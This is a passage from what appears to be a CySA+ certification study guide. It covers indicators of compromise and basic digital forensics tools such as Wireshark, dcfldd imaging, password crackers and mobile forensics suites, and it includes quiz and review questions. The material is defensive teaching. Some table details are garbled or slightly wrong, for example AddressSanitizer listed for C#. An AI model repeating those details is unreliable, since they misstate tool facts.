The spread of malicious code that may be shared along with the file
Inadvertent exposure of sensitive material located in unsecured
directories
Actions taken by the P2P application that make a device more prone
to attack, such as opening ports
Network DoS attacks created by large downloads
Potential liability from pirated intellectual property
Because of the dangers, many organizations choose to prohibit
the use of P2P applications and block common port numbers
used by these applications at the firewall. Another helpful
remediation is to keep all anti-malware software up to date in
case malware is transmitted by the use of P2P applications.
Rogue Device on the Network
Any time new devices appear on a network, there should be
cause for suspicion. While it is possible that users may be
introducing these devices innocently, there are also a number of
bad reasons for these devices to be on the network. The
following types of illegitimate devices may be found on a
network:
Wireless key loggers: These collect information and transmit it
to the criminal via Bluetooth or Wi-Fi.
Wi-Fi and Bluetooth hacking gear: This gear is designed to
capture both Bluetooth and Wi-Fi transmissions.
Rogue access points: Rogue APs are designed to lure your hosts
into a connection for a peer-to-peer attack.
Rogue switches: These switches can attempt to create a trunk
link with a legitimate switch, thus providing access to all VLANs.
Mobile hacking gear: This gear allows a malicious individual to
use software along with software-defined radios to trick cell phone
users into routing connections through a fake cell tower.
The actions required to detect or prevent rogue devices
depend on the type of device. With respect to rogue switches,
ensure that all ports that are required to be trunks are “hard
coded” as trunks and that Dynamic Trunking Protocol (DTP) is
disabled on all switch ports.
With respect to rogue wireless access points, the best solution is
a wireless intrusion prevention system (WIPS). These
systems can not only alert you when any unknown device is in
the area (APs and stations) but can take a number of actions to
prevent security issues, including the following:
Locate a rogue AP by using triangulation when three or more
sensors are present
Deauthenticate any stations that have connected to an “evil twin”
Detect denial-of-service attacks
Detect man-in-the-middle and client-impersonation attacks
Some examples of these tools include Mojo Networks AirTight
WIPS, HP RFProtect, Cisco Adaptive Wireless IPS, Fluke
Networks AirMagnet Enterprise, HP Mobility Security IDS/IPS,
and Zebra Technologies AirDefense.
Scan/Sweep
One of the early steps in a penetration test is to scan or sweep
the network. If no known penetration test is underway but a
scan or sweep is occurring, it is an indication that a malicious
individual may be scanning in preparation for an attack. The
following are the most common of these scans:
Ping sweeps: Also known as ICMP sweeps, ping sweeps use ICMP
to identify all live hosts by pinging all IP addresses in the known
network. All devices that answer are up and running.
Port scans: Once all live hosts are identified, a port scan attempts
to connect to every port on each device and report which ports are
open, or “listening.”
Vulnerability scans: Vulnerability scans are more
comprehensive than the other types of scans in that they identify
open ports and security weaknesses. The good news is that
uncredentialed scans expose less information than credentialed
scans. An uncredentialed scan is a scan in which the scanner
lacks administrative privileges on the device it is scanning.
Unusual Traffic Spike
Any unusual spikes in traffic that are not expected should be
cause for alarm. Just as an increase in bandwidth usage may
indicate DoS or DDoS activity, unusual spikes in traffic may also
indicate this type of activity. Again, know what your traffic
patterns are and create a baseline of this traffic rhythm. With
traffic spikes, there are usually accompanying symptoms such
as network slowness and, potentially, alarms from any IPSs or
IDSs you have deployed.
Keep in mind that there are other legitimate reasons for traffic
spikes. The following are some of the normal activities that can
cause these spikes:
Backup traffic in the LAN
Virus scanner updates
Operating system updates
Mail server issues
Common Protocol over Non-standard Port
Common protocols such as FTP, SMTP, and SNMP use default
port numbers that have been standardized. However, it is
possible to run these protocols over different port numbers.
Whenever you discover this being done, you should treat the
transmission with suspicion because often there is no reason to
use a non-standard port unless you are trying to obscure what
you are doing. It also is a way of evading ACLs that prevent
traffic on the default standard ports. Be aware, though, that
running a common protocol over a non-standard port also is
used legitimately to prevent DoS attacks on default standard
ports by shifting a well-known service to a non-standard port
number. So, it is a technique used by both sides.
HOST-RELATED INDICATORS OF
COMPROMISE
While many indicators of compromise are network related,
some are indications that something is wrong at the system or
host level. These are behaviors of a single system or host rather
than network symptoms.
Processor Consumption
When the processor is very busy with very little or nothing
running to generate the activity, it could be a sign that the
processor is working on behalf of malicious software. Processor
consumption was covered in Chapter 13, “The Importance of
Proactive Threat Hunting.”
Memory Consumption
Another key indicator of a compromised host is increased
memory consumption. Memory consumption was also covered
in Chapter 13.
Drive Capacity Consumption
Available disk space on the host decreasing for no apparent
reason is cause for concern. It could be that the host is storing
information to be transmitted at a later time. Some malware
also causes an increase in drive availability due to deleting files.
Finally, in some cases, the purpose is to fill the drive as part of a
DoS or DDoS attack. One of the difficult aspects of this is that
the drive is typically filled with files that cannot be seen or that
are hidden. When users report a sudden filling of their hard
drive and even a slow buildup over time that cannot be
accounted for, you should scan the device for malware in Safe
Mode. Scanning with multiple products is advised as well.
Unauthorized Software
The presence of any unauthorized software should be
another red flag. If you have invested in a vulnerability scanner,
you can use it to create a list of installed software that can be
compared to a list of authorized software. Unfortunately, many
types of malware do a great job of escaping detection.
One of the ways to prevent unauthorized software is through the
use of Windows AppLocker. By using this tool, you can create
whitelists, which specify the only applications that are allowed,
or you can create a blacklist, specifying which applications
cannot be run.
Figure 17-4 shows a Windows AppLocker rule being created.
This particular rule is based on the path to the application, but
it could also be based on the publisher of the application or on a
hash value of the application file. This particular rule is set to
allow the application in the path, but it could also be set to deny
that application. Once the policy is created, it can be applied as
widely as desired in the Active Directory infrastructure.
Figure 17-4 Create Executable Rules
The following are additional general guidelines for preventing
unwanted software:
Keep the granting of administrative privileges to a minimum.
Audit the presence and use of applications. (AppLocker can do
this.)
Malicious Process
Malicious programs use processes to access the CPU, just as
normal programs do. This means their processes are considered
malicious processes. You can sometimes locate processes that
are using either CPU or memory by using Task Manager, but
again, many malware programs don’t show up in Task Manager.
Either Process Explorer or some other tool may give better
results than Task Manager. If you locate an offending process
and end that process, don’t forget that the program is still there,
and you need to locate it and delete all of its associated files and
registry entries.
Unauthorized Change
If an organization has a robust change control process, there
should be no unauthorized changes made to devices. Whenever
a user reports an unauthorized change in his device, it should be
investigated. Many malicious programs make changes that may
be apparent to the user. Missing files, modified files, new menu
options, strange error messages, and odd system behavior are
all indications of unauthorized changes.
Unauthorized Privilege
Unauthorized changes can be the result of privilege escalation.
Check all system accounts for changes to the permissions and
rights that should be assigned, paying special attention to new
accounts with administrative privileges. When assigning
permissions, always exercise the concept of least privilege. Also
ensure that account reviews take place on a regular basis to
identify privileges that have been escalated and accounts that
are no longer needed.
Data Exfiltration
Data exfiltration is the theft of data from a device. Any
reports of missing or deleted data should be investigated. In
some cases, the data may still be present, but it has been copied
and transmitted to the attacker. Software tools are available to
help track the movement of data in transmissions.
Abnormal OS Process Behavior
When an operating system is behaving strangely and not
operating normally, it could be that the operating system needs
to be reinstalled or that it has been compromised by malware in
some way. While all operating systems occasionally have issues,
persistent issues or issues that are typically not seen or have
never been seen could indicate a compromised operating
system.
File System Change or Anomaly
If file systems change, especially system files (those that are part
of the operating system), it is not a good sign. System files
should not change from the day the operating system was
installed, and if they do, it is an indication of malicious activity.
Many systems offer the ability to verify the integrity of system
files. For example, the System File Checker (SFC) is a utility
built into the Windows 10 operating system that will check for
and repair operating system file corruption.
Registry Change or Anomaly
Most registry changes are made through using tools such as
Control Panel, and changes are rarely made directly to the
registry using the Registry Editor. Changes to registry settings
are common when a compromise has occurred. Changes to the
registry are not obvious and can remain hidden for long periods
of time. You need tools to help identify infected settings in the
registry and to identify the last saved settings. Examples include
Microsoft’s Sysinternals Autoruns and Silent Runners.vbs.
Unauthorized Scheduled Task
In some cases, malware can generate a task that is scheduled to
occur on a regular basis, like communicating back to the hacker
at certain intervals or copying file locations at certain intervals.
Any scheduled task that was not configured by the local team is
a sign of compromise. Access to Scheduled Tasks can be
controlled through the use of Group Policy.
APPLICATION-RELATED INDICATORS OF
COMPROMISE
In some cases, symptoms are not present on the network or in
the activities of the host operating system, but they are present
in the behavior displayed by a compromised application. Some
of these indicators are covered in the following sections.
Anomalous Activity
When an application is behaving strangely and not operating
normally, it could be that the application needs to be reinstalled
or that it has been compromised by malware in some way.
While all applications occasionally have issues, persistent issues
or issues that are typically not seen or have never been seen
could indicate a compromised application.
Introduction of New Accounts
Some applications have their own account database. In that
case, you may find accounts that didn’t previously exist in the
database—and this should be a cause for alarm and
investigation. Many application compromises create accounts
with administrative access for the use of a malicious individual
or for the processes operating on his behalf.
Unexpected Output
When the output from a program is not what is normally
expected and when dialog boxes are altered or the order in
which the boxes are displayed is not correct, it is an indication
that the application has been altered. Reports of strange output
should be investigated.
Unexpected Outbound Communication
Any unexpected outbound traffic should be investigated,
regardless of whether it was discovered as a result of network
monitoring or as a result of monitoring the host or application.
With regard to the application, it can mean that data is being
transmitted back to the malicious individual.
Service Interruption
When an application stops functioning with no apparent
problem, or when an application cannot seem to communicate
in the case of a distributed application, it can be a sign of a
compromised application. Any such interruptions that cannot
be traced to an application, host, or network failure should be
investigated.
Application Log
Chapter 11, “Analyzing Data as Part of Security Monitoring
Activities,” covered the event logs in Windows. One of those
event logs is dedicated to errors and issues related to
applications, the Application log. This log focuses on the
operation of Windows applications. Events in this log are
classified as error, warning, or information, depending on the
severity of the event. The Application log in Windows 10 is
shown in Figure 17-5.
Figure 17-5 Application Log
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in the
Introduction, you have several choices for exam preparation:
the exercises here, Chapter 22, “Final Preparation,” and the
exam simulation questions in the Pearson Test Prep Software
Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted with
the Key Topics icon in the outer margin of the page. Table 17-2
lists a reference of these key topics and the page numbers on
which each is found.
Table 17-2 Key Topics for Chapter 17
Key Topic
Element
Bulleted list
Description
Dangers of irregular peer-to-peer
Page
Number
474
communication
Bulleted list
Types of illegitimate devices
475
Bulleted list
Preventing rogue devices
475
Bulleted list
Scan and sweep types
476
Bulleted list
Legitimate reasons for traffic spikes
476
DEFINE KEY TERMS
Define the following key terms from this chapter and check your
answers in the glossary:
indicators of compromise (IoCs)
beaconing
traditional botnet
peer-to-peer botnet
wireless key loggers
rogue device
wireless intrusion prevention system (WIPS)
ping sweeps
port scans
vulnerability scans
uncredentialed scan
data exfiltration
Application log
REVIEW QUESTIONS
1. __________________ refers to traffic that leaves a
network at regular intervals.
2. List at least two network-related IoCs.
3. Match the following terms with their definitions.
Terms
Definitions
Beaconing
Behavior that indicates a possible compromise
Data
exfiltration
Device you do not control
Rogue device
Data loss through the network
IoC
Traffic that leaves a network at regular
intervals
4. The ____________________ focuses on the operation
of Windows applications.
5. List at least two host-related IoCs.
6. Match the following terms with their definitions.
Terms
Definitions
Peertopeer
botne
t
Collects information and transmits it to the criminal via
Bluetooth or Wi-Fi
Tradi
tiona
l
botne
t
Botnet in which devices that can be reached externally
are compromised and run server software that turns
them into command and control servers for the devices
that are recruited internally that cannot communicate
with the command and control server operating
externally
Wirel
Not only can alert you when any unknown device is in
ess
key
logge
r
the area (APs and stations) but can take a number of
actions
Wirel
ess
intru
sion
preve
ntion
syste
m
(WIP
S)
Botnet in which all the zombies communicate directly
with the command and control server, which is located
outside the network
7. _________________ enables you to look at the graphs
that are similar to Task Manager and identify what caused
spikes in the past, which is not possible with Task Manager
alone.
8. List at least two application-related IoCs.
9. Match the following terms with their definitions.
Terms
Definitions
Ping
sweep
Locates vulnerabilities in systems
Port scan
Scanner lacks administrative privileges on the device
it is scanning
Vulnerab
ility scan
Attempts to connect to every port on each device and
report which ports are open, or “listening”
Uncrede
ntialed
scan
Uses ICMP to identify all live hosts by pinging all IP
addresses in the known network
10. A(n) ______________________ is a scan in which the
scanner lacks administrative privileges on the device it is
scanning.
Chapter 18
Utilizing Basic Digital
Forensics Techniques
This chapter covers the following topics related to Objective 4.4
(Given a scenario, utilize basic digital forensics techniques) of the
CompTIA Cybersecurity Analyst (CySA+) CS0-002 certification
exam:
Network: Covers network protocol analyzing tools including
Wireshark and tcpdump.
Endpoint: Discusses disk and memory digital forensics.
Mobile: Covers mobile forensics techniques.
Cloud: Includes forensic techniques in the cloud.
Virtualization: Covers issues and forensics unique to
virtualization.
Legal hold: Describes the legal concept of retaining information
for legal purposes.
Procedures: Covers forensic procedures.
Hashing: Describes forensic verification, including changes to
binaries.
Carving: Describes the process of carving that allows the recovery
of files.
Data acquisition: Covers data acquisition processes.
Over time, techniques have been developed to perform a
forensic examination of a compromised system or network.
Security professionals should use these time-tested processes to
guide the approach to gathering digital evidence. This chapter
explores many of these basic techniques.
“DO I KNOW THIS ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to assess
whether you should read the entire chapter. If you miss no more
than one of these nine self-assessment questions, you might
want to skip ahead to the “Exam Preparation Tasks” section.
Table 18-1 lists the major headings in this chapter and the “Do I
Know This Already?” quiz questions covering the material in
those headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This Already?”
quiz appear in Appendix A.
Table 18-1 “Do I Know This Already?” Foundation Topics
Section-to-Question Mapping
Foundation Topics Section
Question
Network
1
Endpoint
2
Mobile
3
Cloud
4
Virtualization
5
Legal Hold
6
Procedures
7
Hashing
8
Carving
9
Data Acquisition
10
1. Which of the following is a packet analyzer?
1. Wireshark
2. FTK
3. Helix
4. Cain and Abel
2. Which of the following is a password cracking tool?
1. Wireshark
2. FTK
3. Helix
4. Cain and Abel
3. Which of the following is a data acquisition tool?
1. MD5
2. EnCase
3. Cellebrite
4. dd
4. Which of the following is not true of the cloud-based
approach to vulnerability scanning?
1. Installation costs are lower than with a premises-based solution.
2. Maintenance costs are higher than with a premises-based
solution.
3. Upgrades are included in a subscription.
4. It does not require the client to provide onsite equipment.
5. Which of the following is false with respect to using forensic
tools for the virtual environment?
1. The same tools can be used as in a physical environment.
2. Knowledge of the files that make up a VM is critical.
3. Requires deep knowledge of the log files created by the various
components.
4. Requires access to the hypervisor code.
6. Which of the following often requires that organizations
maintain archived data for longer periods?
1. Chain of custody
2. Lawful intercept
3. Legal hold
4. Discovery
7. Which of the following items in a digital forensic
investigation suite is used to make copies of a hard drive?
1. Imaging utilities
2. Analysis utilities
3. Hashing utilities
4. Password crackers
8. Which of the following is the strongest hashing utility?
1. MD5
2. MD6
3. SHA-1
4. SHA-3
9. Which of the following types of file carving is not supported
by Forensic Explorer?
1. Cluster-based file carving
2. Sector-based file carving
3. Byte-based file carving
4. Partition-based file carving
10. Which of the following is a data acquisition tool for
smartphones?
1. MD5
2. EnCase
3. Cellebrite
4. dd
FOUNDATION TOPICS
NETWORK
During both environmental reconnaissance testing and when
performing forensic investigations, security analysts have a
number of tools at their disposal, and it’s no coincidence that
many of them are the same tools that hackers use. The following
sections cover the most common network tools and describe the
types of information you can determine about the security of the
environment by using each tool.
Wireshark
A packet (or protocol) analyzer can be a standalone device or
software running on a laptop computer. One of the most widely
used software-based protocol analyzers is Wireshark. It
captures raw packets off the interface on which it is configured
and allows you to examine each packet. If the data is
unencrypted, you can read the data. Figure 18-1 shows an
example of Wireshark in use. You can use a protocol analyzer to
capture traffic flowing through a network switch by using the
port mirroring feature of a switch. You can then examine the
captured packets to discern the details of communication flows.
Figure 18-1 Wireshark
In the output shown in Figure 18-1, each line represents a
packet captured on the network. You can see the source IP
address, the destination IP address, the protocol in use, and the
information in the packet. For example, line 511 shows a packet
from 10.68.26.15 to 10.68.26.127, which is a NetBIOS name
resolution query. Line 521 shows an HTTP packet from
10.68.26.46 to a server at 108.160.163.97. Just after that, you
can see the server sending an acknowledgment back. To read a
packet, you click the single packet. If the data is cleartext, you
can read and analyze it. So you can see how an attacker could
use Wireshark to acquire credentials and other sensitive
information. Protocol analyzers can be of help whenever you
need to see what is really happening on your network. For
example, say you have a security policy that mandates certain
types of traffic should be encrypted, but you are not sure that
everyone is complying with this policy. By capturing and
viewing the raw packets on the network, you can determine
whether users are compliant.
Figure 18-2 shows additional output from Wireshark. The top
panel shows packets that have been captured. The line
numbered 384 has been chosen, and the parts of the packet are
shown in the middle pane. In this case, the packet is a response
from a DNS server to a device that queried for a resolution. The
bottom pane shows the actual data in the packet and, because
this packet is not encrypted, you can see that the user was
requesting the IP address for www.cnn.com. Any packet not
encrypted can be read in this pane.
Figure 18-2 Analyzing Wireshark Output
During environmental reconnaissance testing, you can use
packet analyzers to identify traffic that is unencrypted but
should be encrypted (as previously mentioned), protocols that
should not be in use on the network, and other abnormalities.
You can also use these tools to recognize certain types of
attacks. Figure 18-3 shows Wireshark output which indicates
that a SYN flood attack is underway. Notice the lines
highlighted in gray. These are all SYN packets sent to 10.1.0.2,
and they are part of a SYN flood. Notice that the target device is
answering with RST/ACK packets, which indicates that the port
is closed (lines highlighted in red). One of the SYN packets
(highlighted in blue) is open, so you can view its details in the
bottom pane. You can expand this pane and read the
information from all four layers of the TCP model. Currently the
transport layer is expanded.
Figure 18-3 SYN Flood Displayed in Wireshark
tcpdump
tcpdump is a command-line tool that can capture packets on
Linux and Unix platforms. A version for Windows, windump, is
available as well. Using it is a matter of selecting the correct
parameter to go with the tcpdump command. For example, the
following command enables a capture (-i) on the Ethernet 0
interface.
tcpdump -i eth0
To explore the many other switches that are available for
tcpdump, see www.tcpdump.org/tcpdump_man.html.
ENDPOINT
Forensic tools are used in the process of collecting evidence
during a cyber investigation. Many of these tools are used to
obtain evidence from endpoints. Included in this category are
forensic investigation suites, hashing utilities, password
cracking tools, and imaging tools.
Disk
Many tools are dedicated to retrieving evidence from a hard
drive. Others are used to work with the data found on the hard
drive. The following tools are all related in some form or fashion
to obtaining evidence from a hard drive.
FTK
Forensic Toolkit (FTK) is a commercial toolkit that can scan
a hard drive for all sorts of information. This kit also includes an
imaging tool and an MD5 hashing utility. It can locate relevant
evidence, such as deleted e-mails. It also includes a password
cracker and the ability to work with rainbow tables.
For more information on FTK, see
https://accessdata.com/products-services/forensic-toolkit-ftk.
Helix3
Helix3 comes as a live CD that can be mounted on a host
without affecting the data on the host. From the live CD you can
acquire evidence and make drive images. This product is sold on
a subscription basis by e-fense.
For more information on Helix3, see www.efense.com/products.php.
Password Cracking
In the process of executing a forensic investigation, it may be
necessary to crack passwords. Often files have been encrypted
or password protected by malicious individuals, and you need to
attempt to recover the password. There are many, many
password cracking utilities out there; the following are two of
the most popular ones:
John the Ripper: John the Ripper is a password cracker that can
work in Unix/Linux as well as macOS systems. It detects weak Unix
passwords, though it supports hashes for many other platforms as
well. John the Ripper is available in three versions: an official free
version, a community-enhanced version (with many contributed
patches but not as much quality assurance), and an inexpensive pro
version. One mitigation for this attack is the Hash Suite for
Windows.
Cain and Abel: One of the most well-known password cracking
programs, Cain and Abel can recover passwords by sniffing the
network; crack encrypted passwords using dictionary, brute-force,
and cryptanalysis attacks; record VoIP conversations; decode
scrambled passwords; reveal password boxes; uncover cached
passwords; and analyze routing protocols. Figure 18-4 shows
sample output from this tool. As you can see, an array of attacks can
be performed on each located account. This example shows a scan
of the local machine for user accounts in which the program has
located three accounts: Admin, Sharpy, and JSmith. By rightclicking the Admin account, you can use the program to perform a
brute-force attack—or a number of other attacks—on that account.
Figure 18-4 Cain and Abel
Imaging
Before you perform any analysis on a target disk in an
investigation, you should make a bit-level image of the disk so
that you can conduct the analysis on that copy. Therefore, a
forensic imaging utility should be part of your toolkit. There
are many forensic imaging utilities, and many of the forensic
investigation suites contain them. Moreover, many commercial
forensic workstations have these utilities already loaded.
The dd command is a Linux command that is used is to convert
and copy files. The U.S. Department of Defense created a fork (a
variation) of this command called dcfldd that adds additional
forensic functionality. By simply using dd with the proper
parameters and the correct syntax, you can make an image of a
disk, but dcfldd enables you to also generate a hash of the
source disk at the same time. For example, the following
command reads 5 GB from the source drive and writes that to a
file called mymage.dd.aa:
Click here to view code image
dcfldd if=/dev/sourcedrive hash=md5,sha256
hashwindow=10G
md5log=hashmd5.txt sha256log=hashsha.txt \
hashconv=after bs=512
conv=noerror,sync split=5G splitformat=aa of=myimage.dd
This example also calculates the MD5 hash and the SHA-256
hash of the 5-GB chunk. It then reads the next 5 GB and names
that myimage.dd.ab. The MD5 hashes are stored in a file called
hashmd5.txt, and the SHA-256 hashes are stored in a file called
hashsha.txt. The block size for transferring has been set to 512
bytes, and in the event of read errors, dcfldd writes zeros.
Memory
Many penetration testing tools perform an operation called a
core dump or memory dump. Applications store information in
memory, and this information can include sensitive data,
passwords, usernames, and encryption keys. Hackers can use
memory-reading tools to analyze the entire memory content
used by an application. Any vulnerability testing should take
this into consideration and utilize the same tools to identify any
issues in the memory of an application. The following are some
examples of memory-reading tools:
Memdump: This free tool runs on Windows, Linux, and Solaris. It
simply creates a bit-by-bit copy of the volatile memory on a system.
KnTTools: This memory acquisition and analysis tool used with
Windows systems captures physical memory and stores it to a
removable drive or sends it over the network to be archived on a
separate machine.
FATKit: This popular memory forensic tool automates the process
of extracting interesting data from volatile memory. FATKit helps
an analyst visualize the objects it finds to help in understanding the
data that the tool was able to find.
Runtime debugging, on the other hand, is the process of
using a programming tool to not only identify syntactic
problems in code but also discover weaknesses that can lead to
memory leaks and buffer overflows. Runtime debugging tools
operate by examining and monitoring the use of memory. These
tools are specific to the language in which the code was written.
Table 18-2 shows examples of runtime debugging tools and the
operating systems and languages for which they can be used.
Table 18-2 Runtime Debugging Tools
Tool
AddressSanitizer
Operating
Systems
Linux,
macOS
Languages
C, C#
Deleaker
Windows
(Visual
Studio)
C, C#
OutputDebugString
Checker by Software
Verify
Windows
.NET, C, C##, Java,
JavaScript, Lua,
Python, Ruby
Memory dumping can help determine what a hacker might be
able to learn if she were able to cause a memory dump. Runtime
debugging would be the correct approach for discovering
syntactic problems in an application’s code or to identify other
issues, such as memory leaks or potential buffer overflows.
MOBILE
As the use of mobile devices has increased, so has the
involvement of these devices in security incidents. The following
tools, among others, have been created to help obtain evidence
from mobile devices:
Cellebrite: Cellebrite has found a niche by focusing on collecting
evidence from smartphones. It makes extraction devices that can be
used in the field and software that does the same things. These
extraction devices collect metadata from memory and attempt to
access the file system by bypassing the lock mechanism. They don’t
modify any of the data on the devices, which makes this a
forensically “clean” solution. The device looks like a tablet, and you
simply connect a phone to it via USB. For more information, see
https://www.cellebrite.com.
Susteen Secure View 4: This mobile forensic tool is used by
many police departments. It enables users to fully export and report
on all information found on the mobile device. It can create
evidence reports based only on the information that you find is
relevant to your case. This includes deleted data, all files (pictures,
videos, documents, etc.), messages, and more. See
https://www.secureview.us/ for details.
MSAB XRY: This digital forensics and mobile device forensics
product by the Swedish company MSAB is used to analyze and
recover information from mobile devices such as mobile phones,
smartphones, GPS navigation tools, and tablet computers. Check
out XRY at https://www.msab.com/products/xry/.
CLOUD
In Chapter 4, “Analyzing Assessment Output,” you learned
about some cloud tools for vulnerability assessments, and in
Chapter 8, “Security Solutions for Infrastructure Management,”
you learned about cloud anti-malware systems. Let’s look a bit
more at cloud vulnerability scanning.
Cloud-based vulnerability scanning is a service performed from
the vendor’s cloud and is a good example of Software as a
Service (SaaS). The benefits here are the same as the benefits
derived from any SaaS offering—that is, no equipment on the
part of the subscriber and no footprint in the local network.
Figure 18-5 shows a premises-based approach to vulnerability
scanning, and Figure 18-6 shows a cloud-based solution. In the
premises-based approach, the hardware and/or software
vulnerability scanners and associated components are entirely
installed on the client premises, while in the cloud-based
approach, the vulnerability management platform is in the
cloud. Vulnerability scanners for external vulnerability
assessments are located at the solution provider’s site, with
additional scanners on the premises.
Figure 18-5 Premises-Based Scanning
FIGURE 18-6 Cloud-Based Scanning
The following are the advantages of the cloud-based approach:
Installation costs are low because there is no installation and
configuration for the client to complete.
Maintenance costs are low because there is only one centralized
component to maintain, and it is maintained by the vendor (not the
end client).
Upgrades are included in a subscription.
Costs are distributed among all customers.
It does not require the client to provide onsite equipment.
However, there is a considerable disadvantage to the cloudbased approach: Whereas premises-based deployments store
data findings at the organization’s site, in a cloud-based
deployment, the data is resident with the provider. This means
the customer is dependent on the provider to ensure the
security of the vulnerability data.
Qualys is an example of a cloud-based vulnerability scanner.
Sensors are placed throughout the network, and they upload
data to the cloud for analysis. Sensors can be implemented as
dedicated appliances or as software instances on a host. A third
option is to deploy sensors as images on virtual machines.
VIRTUALIZATION
In Chapter 8, you learned the basics of virtualization and how
this technology is used in the cloud environment. With respect
to forensic tools for the virtual environment, the same tools can
be used as in a physical environment. However, the key is
knowledge of the files that make up a VM and how to locate
these files. Each virtualization system has its own filenames and
architecture. Each VM is made up of several files.
Another key aspect of successful forensics in the virtual
environment is deep knowledge of the log files created by the
various components such as the hypervisor and the guest
machine. You need to know not only where these files are
located but also the purpose of each and how to read and
interpret its entries.
LEGAL HOLD
Legal holds are requirements placed on organizations by legal
authorities that require the organization to maintain archived
data for longer periods. Data on a legal hold must be properly
identified, and the appropriate security controls must be put
into place to ensure that the data cannot be tampered with or
deleted. An organization should have policies regarding any
legal holds that may be in place.
Consider the following scenario: An administrator receives a
notification from the legal department that an investigation is
being performed on members of the research department, and
the legal department has advised a legal hold on all documents
for an unspecified period of time. Most likely this legal hold will
violate the organization’s data storage policy and data retention
policy. If a situation like this arises, the IT staff should take time
to document the decision and ensure that the appropriate steps
are taken to ensure that the data is retained and stored for a
longer period, if needed.
PROCEDURES
In Chapter 16, “Applying the Appropriate Incident Response
Procedure,” you learned about the incident response process
and its steps. Review those steps as they are important. This
section introduces some case management tools that can make
the process go smoother.
EnCase Forensic
EnCase Forensic is a case (incident) management tool that
offers built-in templates for specific types of investigations.
These templates are based on workflows, which are the steps to
carry out based on the investigation type. A workflow leads you
through the steps of triage, collection, decryption, processing,
investigation, and reporting of an incident. For more
information, see https://www.guidancesoftware.com/encaseforensic.
Sysinternals
Sysinternals is a Windows command-line tool that contains
more than 70 tools that can be used for both troubleshooting
and security issues. Among these are forensic tools. For more
information, see https://technet.microsoft.com/enus/sysinternals/.
Forensic Investigation Suite
A forensic investigation suite is a collection of tools that
are commonly used in digital forensic investigations. A quality
forensic investigation suite should include the following items:
Imaging utilities: One of the tasks you will be performing is
making copies of storage devices. For this you need a disk imaging
tool. To make system images, you need to use a tool that creates a
bit-level copy of the system. In most cases, you must isolate the
system and remove it from production to create this bit-level copy.
You should ensure that two copies of the image are retained. One
copy of the image will be stored to ensure that an undamaged,
accurate copy is available as evidence. The other copy will be used
during the examination and analysis steps. Message digests (or
hashing digests) should be used to ensure data integrity.
Analysis utilities: You need a tool to analyze the bit-level copy of
the system that is created by the imaging utility. Many of these tools
are available on the market. Often these tools are included in
forensic investigation suites and toolkits, such as the previously
introduced EnCase Forensic, FTK, and Helix.
Chain of custody: While hard copies of chain of custody activities
should be kept, some forensic investigation suites contain software
to help manage this process. These tools can help you maintain an
accurate and legal chain of custody for all evidence, with or without
hard copy (paper) backup. Some suites perform a dual electronic
signature capture that places both signatures in an Excel
spreadsheet as proof of transfer. Those signatures are doubly
encrypted so that if the spreadsheet is altered in any way, the
signatures disappear.
Hashing utilities: These utilities are covered in the next section.
OS and process analysis: These tools focus on the activities of
the operating system and the processes that have been executed.
While most operating systems have tools of some sort that can
report on processes, tools included in a forensic investigation suite
have more robust features and capabilities.
Mobile device forensics: Today, many incidents involve mobile
devices. You need different tools to acquire the required
information from these devices. A forensic investigation suite
should contain tools for this purpose. See the earlier “Mobile”
section for examples.
Password crackers: Many times investigators find passwords
standing in the way of obtaining evidence. Password cracking
utilities are required in such instances. Most forensic investigation
suites include several password cracking utilities for this purpose.
Chapter 4 lists some of these tools.
Cryptography tools: An investigator uses these tools when they
encounter encrypted evidence, which is becoming more common.
Some of these tools can attempt to decrypt the most common types
of encryption (for example, BitLocker, BitLocker To Go, PGP,
TrueCrypt), and they may also be able to locate decryption keys
from RAM dumps and hibernation files.
Log viewers: Finally, because much evidence can be found in the
logs located on the device, a robust log reading utility is also
valuable. A log viewer should have the ability to read all Windows
logs as well as the registry. Moreover, it should also be able to read
logs created by other operating systems. See the “Log Review”
section of Chapter 11, “Analyzing Data as Part of Security
Monitoring Activities.”
HASHING
A hash function takes a message of variable length and produces
a fixed-length hash value. Hash values, also referred to as
message digests, are calculated using the original message. If
the receiver calculates a hash value that is the same, the original
message is intact. If the receiver calculates a hash value that is
different, then the original message has been altered. Hashing
was covered in Chapter 8.
Hashing Utilities
You must be able to prove that certain evidence has not been
altered during your possession of it. Hashing utilities use
hashing algorithms to create a value that can be used later to
verify that the information is unchanged. The two most
common algorithms used are Message Digest 5 (MD5) and
Secure Hashing Algorithm (SHA).
Changes to Binaries
A binary file is a computer file that is not a text file. The term
“binary file” is often used as a term meaning “non-text file.”
These files must be interpreted to be read. Executable files are
often of this type. These file types can be verified using hashing
in the same manner as described in the prior section.
CARVING
Data carving is a technique used when only fragments of data
are available and when no file system metadata is available. It is
a common procedure when performing data recovery, after a
storage device failure, for instance. It is also used in forensics.
A file signature is a constant numerical or text value used to
identify a file format. The object of carving is to identify the file
based on this signature information alone.
Forensic Explorer is a tool for the analysis of electronic evidence
and incudes a data carving tool that searches for signatures. It
offers carving support for more than 300 file types. It supports
Cluster-based file carving
Sector-based file carving
Byte-based file carving
Figure 18-7 shows the File Carving dialog box in Forensic
Explorer.
Figure 18-7 File Carving in Forensic Explorer
DATA ACQUISITION
Earlier in this chapter, in the section “Forensic Investigation
Suite,” you learned about data acquisition tools that should be a
part of your forensic toolkit. Please review that section with
regard to forensic tools.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in the
Introduction, you have several choices for exam preparation:
the exercises here, Chapter 22, “Final Preparation,” and the
exam simulation questions in the Pearson Test Prep Software
Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted with
the Key Topics icon in the outer margin of the page. Table 18-3
lists a reference of these key topics and the page numbers on
which each is found.
Table 18-3 Key Topics in Chapter 18
Key Topic
Element
Description
Page
Number
Figure 182
Analyzing Wireshark output
489
Bulleted
list
Examples of memory-reading tools
493
Figure 185
Premises-based scanning
495
Figure 186
Cloud-based scanning
496
Bulleted
list
Advantages of the cloud-based
approach
496
Bulleted
list
Tools commonly included in a
forensic investigation suite
498
Section
Description of the data carving
forensic technique
500
DEFINE KEY TERMS
Define the following key terms from this chapter and check your
answers in the glossary:
Wireshark
tcpdump
Forensic Toolkit (FTK)
Helix
John the Ripper
Cain and Abel
imaging
dd
Memdump
KnTTools
FATKit
runtime debugging
Cellebrite
Qualys
legal hold
EnCase Forensic
Sysinternals
forensic investigation suite
carving
